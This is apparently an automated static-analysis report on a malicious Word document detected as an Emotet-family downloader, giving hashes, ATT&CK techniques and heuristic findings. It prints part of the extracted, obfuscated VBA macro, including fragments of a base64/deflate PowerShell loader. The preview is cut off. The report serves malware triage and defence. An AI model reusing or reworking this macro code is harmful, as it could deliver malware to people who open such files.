Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 d47ebfb2c289a09c…

MALICIOUS

Office (OLE)

162.5 KB Created: 2018-04-03 16:40:00 Authoring application: Microsoft Office Word First seen: 2018-04-12
MD5: 22a7e826eae7bdba08e2b385b71dce43 SHA-1: df9c4c1bedea84e89a48e396157be4da8ca682c8 SHA-256: d47ebfb2c289a09c689f536203f8940f764296339d46a977700f55bbacceea42
224 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File

The sample is a malicious Office document containing a VBA macro with an AutoOpen function, indicating it's designed to execute automatically upon opening. The macro utilizes CreateObject and appears to be obfuscated, with a truncated string suggesting it attempts to download and execute a second-stage payload. The ClamAV detection ID 'Doc.Malware.Emodldr-10025032-0' further supports its malicious nature.

Heuristics 8

  • ClamAV: Doc.Malware.Emodldr-10025032-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Emodldr-10025032-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 42315 bytes
SHA-256: f4147c52d70b070fb09898b48d68de2f7c8e04aad06e24e4191c7c55d54ef3dd
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 9 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "mYjajBCkjj"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "aiQBpUwEdi"
Function DdzpoZwtrKzfM()
On Error Resume Next
hBcaqs = 14356 * 27530
GBBRj = (47359 + CDate(1083 / Atn(RoUnvE)) / 98299 * XYVrj * 70971 * CInt(HJWnEM) * BsFwCc / CSng(YOGJw))
jlClw = Tan(55851)
cLPpELMa = nLSbN("SzehyruO8P7+Nz8tn183MfsVa5s4n7TItqN389yW9fadSn7obXvq3jvXuw+vse66FdV9ocY", 2, 65)
TUmWW = 41344 * 25191
IMlwQp = (75711 + CDate(55241 / Atn(zCWKwJ)) / 27499 * nWEWGl * 82347 * CInt(zIjFjZ) * PGQBVN / CSng(XwIVlu))
EUKYo = Tan(67503)
OnYUtA = 37133 * 4636
PiHXz = (97439 + CDate(57005 / Atn(lwFwTc)) / 71528 * iUVOt * 57977 * CInt(ihAoZf) * tQmdTE / CSng(wSiniL))
LjvKn = Tan(36120)
XcCQRmABh = nLSbN("h4RGj'+'ECT') ('Sy'+'StEM.IO.'+'COmp'+'ressioN.d'+'EZ9K,U", 5, 48)
jzojl = 84145 * 47772
zJENED = (79071 + CDate(18215 / Atn(IjJfBn)) / 50581 * TfWBF * 57508 * CInt(MSNTww) * MTITYj / CSng(GIWWF))
GJiiK = Tan(27105)
WZWrE = 96977 * 36679
AtlYlN = (25118 + CDate(94414 / Atn(JNKfo)) / 60051 * SKoku * 30825 * CInt(sHpZz) * PlEqG / CSng(sLiWz))
UBKMt = Tan(54215)
zCuUtQ = nLSbN("UWBR921bMh3pXhkrjoGnT9wPswwOSZF", 4, 22)
uzYtKi = 86063 * 70619
sQwoPp = (89042 + CDate(46216 / Atn(TZkmL)) / 78037 * pXaOIf * 26213 * CInt(rDIqs) * INSRSN / CSng(KwfHlD))
CzHnj = Tan(12041)
VRmwC = 31015 * 75049
TOJbw = (85634 + CDate(67705 / Atn(YjBVu)) / 34629 * WnGMA * 554 * CInt(IOHrXZ) * aNjzq / CSng(oGjzB))
DrpWR = Tan(44674)
jYtvLmATuML = nLSbN("GFLlsfL'+'ATEstRE'+'Am')( [IO.meMoRYsTrEAM][conVerT]::fROmBASE64stRing( 'TVjbbttIFvwVPywQB1AMkaLsOMA8tCJG5u42FVpmFq0gD45WS8mykxnbCWVhP376VBUpBzAYXrrPrU6dap2dnvxjXf7+sJr7xZ/r1ddskJ4PiGJ", 6, 176)
HPIwD = 74292 * 47882
FvTGUK = (20185 + CDate(96729 / Atn(UYDLU)) / 31177 * HKuwi * 36456 * CInt(qTURkR) * cKRNi / CSng(Psjvs))
WCtTrm = Tan(99276)
qzBJzw = 70954 * 53940
iRTjdq = (91110 + CDate(2933 / Atn(aRjFr)) / 10338 * Ipdrt * 6494 * CInt(kwKuOQ) * wntPk / CSng(TnkwZ))
mUfPk = Tan(15298)
XRCPqku = nLSbN("Uv/J0BL6mtKx1x54Urj32CrR+SJ72mph", 2, 24)
rpHHki = 51993 * 61769
nSwjlE = (57407 + CDate(57217 / Atn(pHqzUE)) / 60145 * URREh * 49903 * CInt(SYbpjJ) * JjkARB / CSng(nhqBbv))
GsUCb = Tan(33647)
siMDG = 45672 * 10734
mYjdw = (20430 + CDate(37073 / Atn(vjzKMz)) / 9460 * TbAMz * 54417 * CInt(OirVqq) * OinlCZ / CSng(jbESR))
uZnvv = Tan(56660)
SDPzSoiNCUA = nLSbN("9WJBHwpD/IL6t+32AkxgP+Jz8h3xFntqjDsCJ1UP96FRvR3z7ivYxV9BXhp+i77Ngfs2wX0s/WMe58uxb9jP5rZId85t8P4f/njhg/Q7sM9vHMT/M01uz", 7, 109)
jiXsDK = 52487 * 32908
FpdmTV = (41929 + CDate(44114 / Atn(ufGnAw)) / 89345 * TDpqvZ * 24328 * CInt(sjGvis) * phWOpf / CSng(YDQUAw))
wibwXq = Tan(46397)
mAawZE = 6801 * 71783
mpjYs = (57747 + CDate(18347 / Atn(ohGEJ)) / 85090 * LWLkMM * 15361 * CInt(CrviQF) * bdwaw / CSng(ZfnmY))
bjktc = Tan(15053)
TPLiCnQqik = nLSbN("L1LluIjPQvWqzc4I9XXMqzd7M+SD/uG9+hv5tPrVyq/FZ3YMz7Qb0Jc58zpTv5rdSvhwrBfrtGN9WO+h+rRlXLTH+iNPwFn0d8/nygvsriy/B/XtmLg3P7s65VYP8Yjti3omhkeP9cDVHfqtNfxXzB/7Af0e/UpVj3usa1kf9iXysEcfGh7MTyd+qthHviF/wF/Bwb", 5, 191)
kCsTYr = 57939 * 88684
hzvtQR = (11532 + CDate(57259 / Atn(ivomr)) / 47697 * oCjMSw * 36306 * CInt(oUUjJZ) * SQvwpr / CSng(tKdGnt))
nwLTV = Tan(69956)
iXjkL = 15450 * 55070
DfilNr = (61198 + CDate(46252 / Atn(Orknr)) / 12191 * WYZAG * 30705 * CInt(bbDnMj) * TUVXUZ / CSng(RLwaHc))
QERnRT = Tan(26237)
mdrRofIcFtG = nLSbN("iuGziRfEy9ocf9K/s5z95zKD", 4, 18)
icTnqC = 20630 * 19505
TrYvX = (27807 + CDate(29907 / Atn(hnEMc)) / 49870 * nzLWlz * 90525 * CInt(cjltD) * iZGBrH / CSng(DuspC))
kfIbF = Tan(4482)
jvcXKL = 87320 * 18680
RJoLH = (89929 + CDate(31300 / Atn(JLoSV)) / 80891 * XCrMPi * 69037 * CInt(iXzrnP) * wvLoi / CSng(UtVit))
XUsiO = Tan(10923)
SzCOZYvf = nLSbN("WzL('n'+'ew-obj'+'ECT')  ('i'+'o'+'.streAmR'+'eADEr')($_ ,[TEXt.eNCOdIng]::AsciI) n ,v", 4, 79)
AITjuu = 64138 * 58120
oHDco = (91475 + CDate(28982 / Atn(HjLNCJ)) / 41553 * VaM
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.